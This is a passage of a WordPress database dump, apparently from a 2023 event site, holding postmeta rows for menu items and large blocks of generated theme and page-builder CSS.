.hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(36988,5437,'_menu_item_type','custom'),
(36989,5437,'_menu_item_menu_item_parent','2285'),
(36990,5437,'_menu_item_object_id','5437'),
(36991,5437,'_menu_item_object','custom'),
(36992,5437,'_menu_item_target',''),
(36993,5437,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(36994,5437,'_menu_item_xfn',''),
(36995,5437,'_menu_item_url','https://gsw2023.com/index.php/2023/08/28/fun-trips-in-cairo/'),
(36997,2082,'_wp_old_date','2023-08-26'),
(36998,2083,'_wp_old_date','2023-08-26'),
(36999,2346,'_wp_old_date','2023-08-26'),
(37000,2348,'_wp_old_date','2023-08-26'),
(37001,2349,'_wp_old_date','2023-08-26'),
(37002,2350,'_wp_old_date','2023-08-26'),
(37003,2351,'_wp_old_date','2023-08-26'),
(37004,2904,'_wp_old_date','2023-08-26'),
(37005,3556,'_wp_old_date','2023-08-26'),
(37006,4852,'_wp_old_date','2023-08-26'),
(37007,2084,'_wp_old_date','2023-08-26'),
(37008,2352,'_wp_old_date','2023-08-26'),
(37009,5117,'_wp_old_date','2023-08-26'),
(37010,5118,'_wp_old_date','2023-08-26'),
(37011,3671,'_wp_old_date','2023-08-26'),
(37012,5119,'_wp_old_date','2023-08-26'),
(37013,5120,'_wp_old_date','2023-08-26'),
(37014,2281,'_wp_old_date','2023-08-26'),
(37015,2353,'_wp_old_date','2023-08-26'),
(37016,2354,'_wp_old_date','2023-08-26'),
(37017,2355,'_wp_old_date','2023-08-26'),
(37018,2282,'_wp_old_date','2023-08-26'),
(37019,2283,'_wp_old_date','2023-08-26'),
(37020,3645,'_wp_old_date','2023-08-26'),
(37021,2284,'_wp_old_date','2023-08-26'),
(37022,2921,'_wp_old_date','2023-08-26'),
(37023,2285,'_wp_old_date','2023-08-26'),
(37024,5402,'_wp_old_date','2023-08-26'),
(37025,2356,'_wp_old_date','2023-08-26'),
(37026,2357,'_wp_old_date','2023-08-26'),
(37027,2359,'_wp_old_date','2023-08-26'),
(37028,2358,'_wp_old_date','2023-08-26'),
(37029,2286,'_wp_old_date','2023-08-26'),
(37030,5430,'rs_page_bg_color',''),
(37032,3681,'the7_shortcodes_dynamic_css','a:2:{i:0;s:0:\"\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(37033,5438,'_wpb_post_custom_layout','default'),
(37034,5438,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37035,5438,'_wpb_shortcodes_custom_css_updated','1'),
(37036,5439,'_wpb_post_custom_layout','default'),
(37037,5439,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37038,5439,'_wpb_shortcodes_custom_css_updated','1'),
(37039,5440,'_wpb_post_custom_layout','default'),
(37040,5440,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px 